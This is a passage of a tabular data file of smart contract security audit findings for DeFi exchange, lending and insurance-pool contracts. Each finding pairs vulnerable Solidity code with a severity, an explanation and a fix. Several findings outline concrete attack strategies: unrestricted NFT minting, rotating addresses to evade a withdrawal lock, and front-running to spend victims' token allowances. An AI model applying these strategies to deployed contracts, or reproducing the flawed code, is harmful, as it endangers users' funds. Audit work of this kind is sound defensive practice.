fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.BUY);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, 
ExchangeActionType.BUY);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= exData.destAmount, ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n",The return value can be used for verification of the swap or used in the event data.,,"```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n" +Return value is not used for TokenUtils.withdrawTokens,low,"The return value of `TokenUtils.withdrawTokens` which represents the actual amount of tokens that were transferred is never used throughout the repository. 
This might cause discrepancy in the case where the original value of `_amount` was `type(uint256).max`.\\n```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n ""AaveBorrow"",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n\\n```\\nfunction withdrawTokens(\\n address \\_token,\\n address \\_to,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n if (\\_amount == type(uint256).max) {\\n \\_amount = getBalance(\\_token, address(this));\\n }\\n```\\n",The return value can be used to validate the withdrawal or used in the event emitted.,,"```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n ""AaveBorrow"",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n" +Anyone is able to mint NFTs by calling mintNFTsForLM,high,"The contract `LiquidityMiningNFT` has the method `mintNFTsForLM`.\\n```\\nfunction 
mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, """");\\n}\\n```\\n\\nHowever, this contract does not have any kind of special permissions to limit who is able to mint tokens.\\nAn attacker could call `LiquidityMiningNFT.mintNFTsForLM(0xhackerAddress)` to mint tokens for their address and sell them on the marketplace. They are also allowed to mint as many tokens as they want by calling the method multiple times.",Add some permissions to limit only some actors to mint tokens.,,"```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, """");\\n}\\n```\\n" +A liquidity provider can withdraw all his funds anytime,high,"Since some users provide liquidity to sell the insurance policies, it is important that these providers cannot withdraw their funds when the security breach happens and the policyholders are submitting claims. 
The liquidity providers can only request their funds first and withdraw them later (in a week).\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n ""PB: Can't request withdrawal"");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n\\n```\\nfunction withdrawLiquidity() external override {\\n require(getWithdrawalStatus(msg.sender) == WithdrawalStatus.READY,\\n ""PB: Withdrawal is not ready"");\\n\\n uint256 \\_tokensToWithdraw = withdrawalsInfo[msg.sender].amount;\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (withdrawalQueue.length != 0 || totalLiquidity.sub(\\_daiTokensToWithdraw) < totalCoverTokens) {\\n withdrawalQueue.push(msg.sender);\\n } else {\\n \\_withdrawLiquidity(msg.sender, \\_tokensToWithdraw);\\n }\\n}\\n```\\n\\nThere is a restriction in `requestWithdrawal` that requires the liquidity provider to have 
enough funds at the moment of request:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\nrequire(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n```\\n\\nBut after the request is created, these funds can then be transferred to another address. When the request is created, the provider should wait for 7 days, and then there will be 2 days to withdraw the requested amount:\\n```\\nwithdrawalPeriod = 1 weeks;\\nwithdrawalExpirePeriod = 2 days;\\n```\\n\\nThe attacker would have 4 addresses that will send the pool tokens to each other and request withdrawal of the full amount one by one every 2 days. So at least one of the addresses can withdraw all of the funds at any point in time. If the liquidity provider needs to withdraw funds immediately, he should transfer all funds to that address and execute the withdrawal.","Resolution\\nThe funds are now locked when the withdrawal is requested, so funds cannot be transferred after the request, and this bug cannot be exploited anymore.\\nOne of the solutions would be to block the DAIx tokens from being transferred after the withdrawal request.",,"```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n ""PB: Can't request withdrawal"");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\n 
require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n" +The buyPolicyFor/addLiquidityFor should transfer funds from msg.sender,high,"When calling the buyPolicyFor/addLiquidityFor functions, are called with the parameter _policyHolderAddr/_liquidityHolderAddr who is going to be the beneficiary in buying policy/adding liquidity:\\n```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n\\n```\\nfunction addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount) external override {\\n \\_addLiquidityFor(\\_liquidityHolderAddr, \\_liquidityAmount, false);\\n}\\n```\\n\\nDuring the execution, the funds for the policy/liquidity are transferred from the _policyHolderAddr/_liquidityHolderAddr, while it's usually expected that they should be transferred from `msg.sender`. Because of that, anyone can call a function on behalf of a user that gave the allowance to the `PolicyBook`.\\nFor example, a user(victim) wants to add some DAI to the liquidity pool and gives allowance to the `PolicyBook`. After that, the user should call `addLiquidity`, but the attacker can front-run this transaction and buy a policy on behalf of the victim instead.\\nAlso, there is a curious edge case that makes this issue Critical: _policyHolderAddr/_liquidityHolderAddr parameters can be equal to the address of the `PolicyBook` contract. 
That may lead to multiple different dangerous attack vectors.",Make sure that nobody can transfer funds on behalf of the users if it's not intended.,,"```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n" +LiquidityMining can't accept single ERC1155 tokens,high,"The contract `LiquidityMining` is also defined as an `ERC1155Receiver`\\n```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n\\nThe finalized EIP-1155 standard states that a contract which acts as an EIP-1155 Receiver must implement all the functions in the `ERC1155TokenReceiver` interface to be able to accept transfers.\\nThese are indeed implemented here:\\n```\\nfunction onERC1155Received(\\n```\\n\\n```\\nfunction onERC1155BatchReceived(\\n```\\n\\nThe standard states that they will be called and they MUST return a specific `byte4` value, otherwise the transfer will fail.\\nHowever one of the methods returns an incorrect value. 
This seems to an error generated by a copy/paste action.\\n```\\nfunction onERC1155Received(\\n address operator,\\n address from,\\n uint256 id,\\n uint256 value,\\n bytes memory data\\n)\\n external\\n pure\\n override\\n returns(bytes4)\\n{\\n return bytes4(keccak256(""onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)""));\\n}\\n```\\n\\nThe value returned is equal to\\n`bytes4(keccak256(""onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)""));`\\nBut it should be\\n`bytes4(keccak256(""onERC1155Received(address,address,uint256,uint256,bytes)""))`.\\nOn top of this, the contract MUST implement the ERC-165 standard to correctly respond to `supportsInterface`.","Change the return value of `onERC1155Received` to be equal to `0xf23a6e61` which represents `bytes4(keccak256(""onERC1155Received(address,address,uint256,uint256,bytes)""))`.\\nAlso, make sure to implement `supportsInterface` to signify support of `ERC1155TokenReceiver` to accept transfers.\\nAdd tests to check the functionality is correct and make sure these kinds of bugs do not exist in the future.\\nMake sure to read the EIP-1155 and EIP-165 standards in detail and implement them correctly.",,"```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n" +DAI is assumed to have the same price as DAIx in the staking contract,high,"When a liquidity provider stakes tokens to the `BMIDAIStaking` contract, the equal amount of DAI and DAIx are transferred from the pool contract.\\n```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, ""BMIDAIStaking: Can't stake zero tokens"");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), 
\\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n",Only the corresponding amount of DAI should be transferred to the pool.,,"```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, ""BMIDAIStaking: Can't stake zero tokens"");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n" +_updateWithdrawalQueue can run out of gas,high,"When there's not enough collateral to withdraw liquidity from a policy book, the withdrawal request is added to a queue. The queue is supposed to be processed and cleared once there are enough funds for that. The only way to do so is the `_updateWithdrawalQueue` function that is caller when new liquidity is added:\\n```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n\\nThe problem is that this function can only process all queue until the pool run out 
of available funds or the whole queue is going to be processed. If the queue is big enough, this process can be stuck.",Pass the parameter to the `_updateWithdrawalQueue` that defines how many requests to process in the queue per one call.,,"```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n" +The PolicyBook should make DAI transfers inside the contract,medium,"The `PolicyBook` contract gives full allowance over DAI tokens to the other contracts:\\n```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n\\nThat behavior is dangerous because it's hard to keep track of and control the contract's DAI balance. And it's also hard to track in the code where the balance of the `PolicyBook` can be changed from.","It's better to perform all the transfers inside the `PolicyBook` contract. 
So if the `bmiDaiStaking` and the `claimVoting` contracts need DAI tokens from the `PolicyBook`, they should call some function of the `PolicyBook` to perform transfers.",,"```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n" +The totalCoverTokens is only updated when the policy is bought,medium,"The `totalCoverTokens` value represents the amount of collateral that needs to be locked in the policy book. It should be changed either by buying a new policy or when an old policy expires. The problem is that when the old policy expires, this value is not updated; it is only updated when someone buys a policy by calling the `_updateEpochsInfo` function:\\n```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n\\nUsers waiting to withdraw liquidity should wait for someone to buy the policy to update the `totalCoverTokens`.",Resolution\\nThe `updateEpochsInfo` function is now public and can be called by anyone.\\nMake sure it's possible to call the `_updateEpochsInfo` function without buying a new policy.,,```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < 
currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n +Unbounded loops in LiquidityMining,medium,There are some methods that have unbounded loops and will fail when enough items exist in the arrays.\\n```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_membersNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n\\nThese methods will fail when lots of items will be added to them.,"Consider adding limits (from, to) when requesting the items.",,```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n +The _removeFromQueue is very gas greedy,medium,"The `_removeFromQueue` function is supposed to remove `_countToRemove` elements from the queue:\\n```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n\\nThis function uses too much gas, which makes it easier to make attacks on the system. Even if only one request is removed and executed, this function rewrites all the requests to the storage.","The data structure should be changed so this function shouldn't rewrite the requests that did not change. 
For example, it can be a mapping `(unit => address)` with 2 indexes `(start, end)` that are only increasing.",,```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n +Withdrawal with zero amount is possible,medium,"When creating a withdrawal request, the amount of tokens to withdraw is passed as a parameter:\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n\\nThe problem is that this parameter can be zero, and the function will be successfully executed. Moreover, this request can then be added to the queue, and the actual withdrawal will also be executed with zero value. Addresses that never added any liquidity could spam the system with these requests.",Do not allow withdrawals of zero tokens.,,```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n +The withdrawal queue is only updated when the liquidity is added,medium,"Sometimes when the amount of liquidity is not much higher than the number of tokens locked for the collateral, it's impossible to withdraw liquidity. For a user that wants to withdraw liquidity, a withdrawal request is created. If the request can't be executed, it's added to the withdrawal queue, and the user needs to wait until there's enough collateral for withdrawal. 
There are potentially 2 ways to achieve that: either someone adds more liquidity or some existing policies expire.\\nCurrently, the queue can only be cleared when the internal `_updateWithdrawalQueue` function is called. And it is only called in one place while adding liquidity:\\n```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n","It would be better if the queue could be processed when some policies expire without adding new liquidity. 
For example, there may be an external function that allows users to process the queue.",,"```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n" +Optimize gas usage when checking max length of arrays,low,"There are a few cases where some arrays have to be limited to a number of items.\\nAnd the max size is enforced by removing the last item if the array reached max size + 1.\\n```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n\\n```\\nif (topUsers.length == MAX\\_TOP\\_USERS\\_SIZE.add(1)) {\\n topUsers.pop();\\n}\\n```\\n\\n```\\nif (\\_addresses.length == MAX\\_GROUP\\_LEADERS\\_SIZE.add(1)) {\\n groupsLeaders[\\_referralLink].pop();\\n}\\n```\\n\\nA simpler and cheaper way to check if an item should be removed is to change the condition to\\n```\\nif (limitedSizedArray.length > MAX\\_DEFINED\\_SIZE\\_FOR\\_ARRAY) {\\n limitedSizedArray.pop();\\n}\\n```\\n\\nThis check does not need or do a SafeMath call (which is more expensive), and because of the limited number of items, as well as a practical impossibility to add enough items to overflow the limit, makes it a preferred way to check the maximum limit.","Rewrite the checks and remove SafeMath operations, as well as the addition by 1 and change the check to a “greater than” verification.",,```\\nif (leaderboard.length == 
MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n +Methods return values that are never used,low,"When a user calls `investDAI` these 3 methods are called internally:\\n```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n\\nEach method returns a boolean, but the value is never used. It is also unclear what the value should represent.",Remove the returned variable or use it in method `investDAI`.,,```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n +Save some gas when looping over state arrays,low,There are a few loops over state arrays in `LiquidutyMining`.\\n```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < topUsers.length; i++) {\\n```\\n\\nConsider caching the length in a local variable to reduce gas costs.\\nSimilar to\\n```\\nuint256 \\_usersNumber = allUsers.length;\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n,Reduce gas cost by caching array state length in a local variable.,,```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n +Optimize gas costs when handling liquidity start and end times,low,"When the `LiquidityMining` contract is deployed, `startLiquidityMiningTime` saves the current block timestamp.\\n```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n\\nThis value is never changed.\\nThere also exists an end limit calculated by `getEndLMTime`.\\n```\\nfunction getEndLMTime() public view override returns (uint256) {\\n return startLiquidityMiningTime.add(2 weeks);\\n}\\n```\\n\\nThis value is also fixed, once the start was defined.\\nNone of the values change after the contract was deployed. 
This is why you can use the immutable feature provided by Solidity.\\nIt will reduce costs significantly.\\n```\\ncontract A {\\n uint public immutable start;\\n uint public immutable end;\\n \\n constructor() {\\n start = block.timestamp;\\n end = block.timestamp + 2 weeks;\\n }\\n}\\n```\\n\\nThis contract defines 2 variables: `start` and `end` and their value is fixed on deploy and cannot be changed.\\nIt does not need to use `SafeMath` because there's no risk of overflowing.\\nSetting `public` on both variables creates getters, and calling `A.start()` and `A.end()` returns the respective values.\\nHaving set as immutable does not request EVM storage and makes them very cheap to access.",Use Solidity's immutable feature to reduce gas costs and rename variables for consistency.\\nUse the example for inspiration.,,```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n +Computing the quote should be done for a positive amount of tokens,low,"When a policy is bought, a quote is requested from the `PolicyQuote` contract.\\n```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n\\n```\\nuint256 \\_totalPrice = policyQuote.getQuote(\\_totalSeconds, \\_coverTokens, address(this));\\n```\\n\\nThe `getQuote` call is then forwarded to an internal function\\n```\\nfunction getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n external view override returns (uint256 \\_daiTokens)\\n{\\n \\_daiTokens = \\_getQuote(\\_durationSeconds, \\_tokens, \\_policyBookAddr);\\n}\\n```\\n\\n```\\nfunction \\_getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n internal view returns (uint256)\\n{\\n```\\n\\nThere are some basic checks that make sure the total covered tokens with the requested quote do not exceed the total liquidity. 
